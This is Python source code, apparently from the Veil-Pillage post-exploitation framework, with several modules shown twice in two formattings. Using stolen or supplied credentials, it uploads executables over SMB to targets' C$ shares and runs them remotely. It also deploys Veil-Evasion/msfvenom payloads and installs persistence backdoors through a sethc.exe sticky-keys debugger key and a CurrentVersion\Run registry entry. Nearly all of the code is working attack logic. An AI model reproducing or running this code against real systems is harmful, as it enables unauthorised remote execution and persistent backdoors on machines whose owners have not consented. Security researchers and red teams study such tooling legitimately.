def run(self):
# assume single set of credentials
username, password = self.creds[0]
# grab our options
triggerMethod = self.required_options["trigger_method"][0]
out_file = self.required_options["out_file"][0]
args = self.required_options["args"][0]
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# command to invoke netview and output it to a temporary file
exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/netview.exe"
# the command to invoke netview.exe
cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file
# see if there are any extra arguments we want to add in
if args != "none":
cmd = cmd + " " + args
for target in self.targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
# execute netview.exe
command_methods.executeCommand(target, username, password, cmd, triggerMethod)
self.output += "[*] netview.exe uploaded and executed using creds '"+username+":"+password+"' on "+target+" using "+triggerMethod+"\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
# grab our options
triggerMethod = self.required_options["trigger_method"][0]
out_file = self.required_options["out_file"][0]
args = self.required_options["args"][0]
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# command to invoke netview and output it to a temporary file
exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/netview.exe"
# the command to invoke netview.exe
cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file
# see if there are any extra arguments we want to add in
if args != "none":
cmd = cmd + " " + args
for target in self.targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$",
"\\Windows\\Temp\\", exePath)
# execute netview.exe
command_methods.executeCommand(target, username, password, cmd,
triggerMethod)
self.output += "[*] netview.exe uploaded and executed using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n"
def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""):
"""
Take a particular exe at "exePath" path and uploads it to each
target in targets, using the specified username and password.
The specified triggerMethod (default wmis) is then used to trigger the
uploaded executable.
"""
# if we get a single target, make it into a list
if type(targets) is str:
targets = [targets]
# randomize the uploaded .exe file name
uploadFileName = helpers.randomString() + ".exe"
# copy the payload to the random hostedFileName in the temp directory
os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/"+uploadFileName)
# command to trigger the uploaded executable
cmd = "C:\\Windows\\Temp\\"+uploadFileName+" "+exeArgs
for target in targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", settings.TEMP_DIR+"/"+uploadFileName, 5)
# execute the trigger command
command_methods.executeCommand(target, username, password, cmd, triggerMethod)
# return the randomized name in the calling method later wants
# to clean the processes up
return uploadFileName
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# command to invoke finddllhijack and output it to a temporary file
exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe"
cmd = "C:\\Windows\\Temp\\finddllhijack.exe"
for target in self.targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
# execute finddllhijack and get the results
out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5)
# cleanup
command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)
if out != "":
self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
def uploadTrigger(targets,
username,
password,
exePath,
triggerMethod="wmis",
exeArgs=""):
"""
Take a particular exe at "exePath" path and uploads it to each
target in targets, using the specified username and password.
The specified triggerMethod (default wmis) is then used to trigger the
uploaded executable.
"""
# if we get a single target, make it into a list
if type(targets) is str:
targets = [targets]
# randomize the uploaded .exe file name
uploadFileName = helpers.randomString() + ".exe"
# copy the payload to the random hostedFileName in the temp directory
os.system("cp " + exePath + " /" + settings.TEMP_DIR + "/" +
uploadFileName)
# command to trigger the uploaded executable
cmd = "C:\\Windows\\Temp\\" + uploadFileName + " " + exeArgs
for target in targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\",
settings.TEMP_DIR + "/" + uploadFileName, 5)
# execute the trigger command
command_methods.executeCommand(target, username, password, cmd,
triggerMethod)
# return the randomized name in the calling method later wants
# to clean the processes up
return uploadFileName
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# command to invoke finddllhijack and output it to a temporary file
exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
cmd = "C:\\Windows\\Temp\\finddllhijack.exe"
for target in self.targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$",
"\\Windows\\Temp\\", exePath)
# execute finddllhijack and get the results
out = command_methods.executeResult(target,
username,
password,
cmd,
triggerMethod,
pause=5)
# cleanup
command_methods.executeCommand(
target, username, password,
"del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target,
"finddllhijack.txt", out)
if out != "":
self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
uploadName = self.required_options["upload_name"][0]
# if we're using Veil-Evasion for payload generation
if self.required_options["exe_path"][0].lower() == "veil":
# create a Veil-Evasion controller object for payload generation
con = controller.Controller()
# check various possibly flags passed by the command line
# if we don't have payload specified, jump to the main controller menu
if not self.args.p:
payloadPath = con.MainMenu()
# otherwise, set all the appropriate payload options
else:
# pull out any required options from the command line and
# build the proper dictionary so we can set the payload manually
options = {}
if self.args.c:
options['required_options'] = {}
for option in self.args.c:
name,value = option.split("=")
options['required_options'][name] = [value, ""]
# pull out any msfvenom shellcode specification and msfvenom options
if self.args.msfpayload:
options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]
# manually set the payload in the controller object
con.SetPayload(self.args.p, options)
# generate the payload code
code = con.GeneratePayload()
# grab the generated payload .exe name
payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)
# nicely print the title and module name again (since Veil-Evasion trashes this)
messages.title()
print " [*] Executing module: " + helpers.color(self.name) + "..."
# sanity check if the user exited Veil-Evasion execution
if not payloadPath or payloadPath == "":
print helpers.color(" [!] No output from Veil-Evasion", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we have a custom-specified .exe, use that instead
else:
payloadPath = self.required_options["exe_path"][0]
# if the .exe path doesn't exist, print and error and return
if not os.path.exists(payloadPath):
print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# make sure the name ends with ".exe"
if not uploadName.endswith(".exe"):
uploadName += ".exe"
# copy the resulting binary into the temporary directory with the appropriate name
os.system("cp "+payloadPath+" /tmp/"+uploadName)
for target in self.targets:
baseName = payloadPath.split("/")[-1]
# upload the payload to C:\Windows\System32\
smb.uploadFile(target, username, password, "C$", "\\Windows\\","/tmp/"+uploadName)
self.output += "[*] Binary '"+baseName+"' uploaded to C:\\Windows\\"+uploadName+" using creds '"+username+":"+password+"' on : " + target + "\n"
# the registry command to set up the sethc stickkeys backdoor for the binary
sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\"+uploadName+"\""
# execute the sethc command and get the result
sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)
if sethcResult == "":
self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
elif "The operation completed successfully" in sethcResult:
self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"
# build our cleanup -> deleting this registry run value
cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
uploadName = self.required_options["upload_name"][0]
key_name = self.required_options["key_name"][0]
# if we're using Veil-Evasion for payload generation
if self.required_options["exe_path"][0].lower() == "veil":
# create a Veil-Evasion controller object for payload generation
con = controller.Controller()
# if we don't have payload specified, jump to the main controller menu
if not self.args.p:
payloadPath = con.MainMenu()
# otherwise, set all the appropriate payload options
else:
# pull out any required options from the command line and
# build the proper dictionary so we can set the payload manually
options = {}
if self.args.c:
options['required_options'] = {}
for option in self.args.c:
name, value = option.split("=")
options['required_options'][name] = [value, ""]
# pull out any msfvenom shellcode specification and msfvenom options
if self.args.msfpayload:
options['msfvenom'] = [
self.args.msfpayload, self.args.msfoptions
]
# manually set the payload in the controller object
con.SetPayload(self.args.p, options)
# generate the payload code
code = con.GeneratePayload()
# grab the generated payload .exe name
payloadPath = con.OutputMenu(con.payload,
code,
showTitle=True,
interactive=False)
# nicely print the title and module name again (since Veil-Evasion trashes this)
messages.title()
print " [*] Executing module: " + helpers.color(self.name) + "..."
# sanity check if the user exited Veil-Evasion execution
if not payloadPath or payloadPath == "":
print helpers.color(" [!] No output from Veil-Evasion",
warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we have a custom-specified .exe, use that instead
else:
payloadPath = self.required_options["exe_path"][0]
# if the .exe path doesn't exist, print and error and return
if not os.path.exists(payloadPath):
print helpers.color("\n\n [!] Invalid .exe path specified",
warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# make sure the name ends with ".exe"
if not uploadName.endswith(".exe"):
uploadName += ".exe"
# copy the resulting binary into the temporary directory with the appropriate name
os.system("cp " + payloadPath + " /tmp/" + uploadName)
for target in self.targets:
baseName = payloadPath.split("/")[-1]
# upload the payload to C:\Windows\System32\
smb.uploadFile(target, username, password, "C$", "\\Windows\\",
"/tmp/" + uploadName)
self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n"
# the registry command to set up the sethc stickkeys backdoor for the binary
regCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /f /v " + key_name + " /t REG_SZ /d \"C:\\Windows\\" + uploadName + "\""
# execute the sethc command and get the result
sethcResult = command_methods.executeResult(
target, username, password, regCommand, triggerMethod)
if sethcResult == "":
self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The operation completed successfully" in sethcResult:
self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
# build our cleanup -> deleting this registry run value
cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v " + key_name + " /f"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"